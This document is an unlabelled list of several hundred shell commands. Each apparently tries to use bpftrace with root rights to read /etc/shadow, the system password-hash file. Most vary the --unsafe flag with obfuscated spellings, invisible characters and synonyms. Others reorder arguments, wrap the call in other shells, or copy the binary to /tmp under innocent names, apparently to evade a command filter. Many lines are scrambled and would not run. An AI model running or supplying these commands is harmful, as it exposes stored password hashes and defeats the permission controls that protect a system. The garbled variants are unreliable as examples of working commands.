1. `sudo bpftrace --"unsafe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `sudo bpftrace --un"safe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
3. `sudo bpftrace --uns afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
4. `sudo bpftrace --un_safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `sudo bpftrace --unsa+fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `sudo bpftrace --unsaf\\e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
7. `sudo bpftrace --uns\"afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
8. `sudo bpftrace --unsa/**/fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
9. `sudo bpftrace --u\nsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
10. `sudo bpftrace --unsa\tfe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
11. `sudo bpftrace --uns<afe> -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
12. `sudo bpftrace '--unsafe' -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
13. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe`
14. `sudo bpftrace --un-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo bpftrace --u_n_s_a_f_e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
16. `sudo bpftrace --uNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
17. `sudo bpftrace --unsa\u0066e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
18. `sudo bpftrace --unsa$fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
19. `sudo bpftrace --unsa%20fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
20. `sudo bpftrace --"un""safe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
21. `sudo bpftrace --unsaf﻿e -e 'BEGIN { cat("/etc/shadow"); exit(); }'` *(invisible char)*
22. `sudo bpftrace --unsaf\u200b-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
23. `sudo bpftrace --@unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
24. `sudo bpftrace --_unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
25. `sudo bpftrace --unsaf-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
26. `sudo bpftrace --uunsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
27. `sudo bpftrace --unsa-f-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
28. `sudo bpftrace --unsafee -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
29. `sudo bpftrace --u n s a f e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
30. `sudo bpftrace --"uns""afe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
32. `sudo bpftrace --un\ safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
33. `sudo bpftrace --unsa\ fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
34. `sudo bpftrace --un$afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
35. `sudo bpftrace --u$nsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
36. `sudo bpftrace --un.sa.fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
37. `sudo bpftrace --un/safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
38. `sudo bpftrace --un_safe_ -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
39. `sudo bpftrace --unsafe\ -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
40. `sudo bpftrace --un-safe- -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
41. `sudo bpftrace --unSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
42. `sudo bpftrace --UNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
43. `sudo bpftrace --unSaFe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
44. `sudo bpftrace --unsaf\`e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
45. `sudo bpftrace --un"sa"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
46. `sudo bpftrace --"un"safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
47. `sudo bpftrace --uns"a"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
48. `sudo bpftrace --u"nsa"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
49. `sudo bpftrace --unsa\fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
50. `sudo bpftrace --un saf e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
51. `sudo bpftrace --u nsa fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
52. `sudo bpftrace --unsaf#e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
53. `sudo bpftrace --unsaf@e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
54. `sudo bpftrace --unsa!fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
55. `sudo bpftrace --un^safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
56. `sudo bpftrace --un~safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
57. `sudo bpftrace --un%safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
58. `sudo bpftrace --un+safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
59. `sudo bpftrace --unsa=fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
60. `sudo bpftrace --unsa(fe) -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
61. `sudo bpftrace --un{safe} -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
1. `sudo bpftrace --remote-e --e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `sudo bpftrace --un-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
3. `sudo bpftrace --UNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
4. `sudo bpftrace --insecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `sudo bpftrace --not-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `sudo bpftrace --usafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
7. `sudo bpftrace --allow-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
8. `sudo bpftrace --un_safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
9. `sudo bpftrace --un.s.a.f.e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
10. `sudo bpftrace --us@fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
11. `sudo bpftrace --dangerous -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
12. `sudo bpftrace --not-secure -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
13. `sudo bpftrace --u_n_s_a_f_e -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
14. `sudo bpftrace --unsafe=true -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo bpftrace --enable-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
16. `sudo bpftrace --allow_danger -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
17. `sudo bpftrace -e --unsafe 'BEGIN { cat("/etc/shadow"); exit(); }'`
18. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe-mode`
19. `sudo bpftrace --flag=unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
20. `sudo bpftrace --risk-elevated -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
21. `sudo bpftrace --nonsecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
22. `sudo bpftrace --execute-risk -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
23. `sudo bpftrace --hazardous -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
24. `sudo bpftrace --temp-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
25. `sudo bpftrace --danger-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
26. `sudo bpftrace --critical-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
27. `sudo bpftrace --peril -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
28. `sudo bpftrace --flag_unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
29. `sudo bpftrace --bypass-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
30. `sudo bpftrace --testflag=unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
32. `sudo bpftrace --insecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
33. `sudo bpftrace --risk -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
34. `sudo bpftrace --danger -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
35. `sudo bpftrace --hazard -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
36. `sudo bpftrace --no-sandbox -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
37. `sudo bpftrace --permit-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
38. `sudo bpftrace --trust-me -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
39. `sudo bpftrace --raw -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
40. `sudo bpftrace --force -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
41. `sudo bpftrace --override -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
42. `sudo bpftrace --allow-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
43. `sudo bpftrace --no-guard -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
44. `sudo bpftrace --elevated -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
45. `sudo bpftrace --debug-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
46. `sudo bpftrace --expert -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
47. `sudo bpftrace --open-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
48. `sudo bpftrace --free-run -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
49. `sudo bpftrace --no-checks -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
50. `sudo bpftrace --unrestricted -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
51. `sudo bpftrace --power-user -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
52. `sudo bpftrace --danger-zone -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
53. `sudo bpftrace --raw-exec -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
54. `sudo bpftrace --low-safety -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
55. `sudo bpftrace --bypass-guard -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
56. `sudo bpftrace --no-restrictions -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
57. `sudo bpftrace --advanced -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
58. `sudo bpftrace --internal -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
59. `sudo bpftrace --full-access -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
60. `sudo bpftrace --kernel-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
61. `sudo bpftrace --privileged -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
1. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
3. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
4. `sudo ./bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `sudo /usr/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
7. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' # unsafe removed`
8. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' # no unsafe flag`
9. `/usr/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
10. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
11. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
12. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
13. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
14. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
16. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
17. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
18. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
19. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
20. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
21. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
22. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
23. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
24. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
25. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
26. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
27. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
28. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
29. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
30. `./bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
1. `env PATH=/usr/bin bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `/usr/local/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
3. `sudo env bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
4. `command bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `setsid bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `nohup bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
7. `bash -lc 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'`
8. `sh -c 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'`
9. `/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
10. `sudo /bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
11. `env -i PATH=/usr/bin bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
12. `sudo -E bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
13. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' < /dev/null`
14. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' 2>/dev/null`
15. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' 1>/tmp/out.txt`
16. `env BPFTRACE_STRLEN=64 bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
17. `sudo env BPFTRACE_STRLEN=64 bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
18. `bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }'`
19. `sudo bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }'`
20. `bpftrace -e 'BEGIN { print(cat("/etc/shadow")); exit(); }'`
21. `bpftrace -e 'BEGIN { printf("%s", cat("/etc/shadow")); exit(); }'`
22. `bpftrace -e 'BEGIN { cat("/etc/shadow"); }'`
23. `bpftrace -e 'BEGIN { cat("/etc/shadow"); sleep(0); exit(); }'`
24. `bpftrace -e 'BEGIN { cat("/etc/shadow"); END { exit(); } }'`
25. `sudo bash -c 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'`
26. `env SHELL=/bin/bash bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
27. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(0); }'`
28. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(1); }'`
29. `bpftrace -e 'BEGIN { cat("/etc/shadow"); return; }'`
30. `bpftrace -e 'BEGIN { cat("/etc/shadow"); } END { exit(); }'`
1. `sudo --unsafe bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace --unsafe`
3. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe sudo`
4. `-unsafe sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `bpftrace --unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe`
7. `e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace --unsafe`
8. `sudo bpftrace --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }'`
9. `sudo bpftrace --unsafe -e 'cat("/etc/shadow"); BEGIN { exit(); }'`
10. `sudo bpftrace -e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe`
11. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); } exit();' --unsafe`
12. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe`
13. `bpftrace sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
14. `-unsafe bpftrace sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace`
16. `bpftrace -e 'BEGIN { exit(); }' sudo --unsafe`
17. `sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace`
18. `sudo -e 'BEGIN { exit(); cat("/etc/shadow"); }' bpftrace --unsafe`
19. `sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace --unsafe`
20. `sudo bpftrace -e 'exit(); BEGIN { cat("/etc/shadow"); }' --unsafe`
21. `sudo --unsafe bpftrace -e 'exit(); BEGIN { cat("/etc/shadow"); }'`
22. `-unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace`
23. `bpftrace --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }' sudo`
24. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); }' --unsafe exit();`
25. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe`
26. `sudo bpftrace --unsafe -e 'BEGIN { exit(); cat("/etc/shadow"); }'`
27. `sudo -e 'exit(); BEGIN { cat("/etc/shadow"); }' bpftrace --unsafe`
28. `e 'BEGIN { exit(); cat("/etc/shadow"); }' bpftrace sudo --unsafe`
29. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe sudo`
30. `sudo bpftrace --unsafe -e 'BEGIN { exit(); } cat("/etc/shadow");'`
1. `-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace`
2. `e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace sudo`
3. `bpftrace sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe`
4. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe`
5. `sudo --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }' bpftrace`
6. `sudo -e 'BEGIN { cat("/etc/shadow"); }' bpftrace --unsafe exit();`
7. `e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace sudo --unsafe`
8. `sudo bpftrace -e 'BEGIN { exit(); }' --unsafe; cat /etc/shadow`
9. `sudo bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }' --unsafe`
10. `sudo bpftrace --unsafe -e 'BEGIN { system("cat /etc/shadow"); exit(); }'`
11. `-unsafe bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo`
12. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe; sudo`
13. `sudo bpftrace --unsafe -e 'BEGIN { exit(); }'; cat /etc/shadow`
14. `bpftrace --unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe`
16. `sudo bpftrace -e 'BEGIN { exit(); }' --unsafe; cat /etc/shadow`
17. `bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); } exit();' sudo`
18. `sudo -e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe bpftrace`
19. `e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe sudo bpftrace`
20. `-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace sudo`
21. `bpftrace sudo --unsafe -e 'BEGIN { exit(); cat("/etc/shadow"); }'`
22. `bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe`
23. `sudo bpftrace --unsafe -e 'exit(); BEGIN { system("cat /etc/shadow"); }'`
24. `sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace`
25. `bpftrace -e 'BEGIN { exit(); }' --unsafe sudo; cat /etc/shadow`
26. `-unsafe sudo bpftrace -e 'BEGIN { exit(); }'; cat /etc/shadow`
27. `sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
28. `sudo -e 'BEGIN { system("cat /etc/shadow"); exit(); }' bpftrace --unsafe`
29. `sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace`
30. `e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace --unsafe`
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=017700000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0x1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0000.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.000.001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0x0.0x0.0x1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+2130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.00000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001U'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000000000.000000.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.1L'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0b00000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0x01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007F000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=000000127.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433L'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0000.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.000000.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.00.001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433U'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=02130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x0000007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+0x00007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0000002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001i'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433i'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.0.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007F000001UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F000001LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0000177000000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.1'
1. `sudo cp /usr/bin/bpftrace /tmp/t && sudo /tmp/t --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
2. `sudo cp /usr/bin/bpftrace /tmp/bt && sudo /tmp/bt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
3. `sudo cp /usr/bin/bpftrace /tmp/xtrace && sudo /tmp/xtrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
4. `sudo cp /usr/bin/bpftrace /tmp/sysmon && sudo /tmp/sysmon --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
5. `sudo cp /usr/bin/bpftrace /tmp/trace && sudo /tmp/trace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
6. `sudo cp /usr/bin/bpftrace /tmp/pt && sudo /tmp/pt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
7. `sudo cp /usr/bin/bpftrace /tmp/run && sudo /tmp/run --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
8. `sudo cp /usr/bin/bpftrace /tmp/diag && sudo /tmp/diag --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
9. `sudo cp /usr/bin/bpftrace /tmp/agent && sudo /tmp/agent --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
10. `sudo cp /usr/bin/bpftrace /tmp/helper && sudo /tmp/helper --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
11. `sudo cp /usr/bin/bpftrace /var/tmp/t1 && sudo /var/tmp/t1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
12. `sudo cp /usr/bin/bpftrace /var/tmp/exec && sudo /var/tmp/exec --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
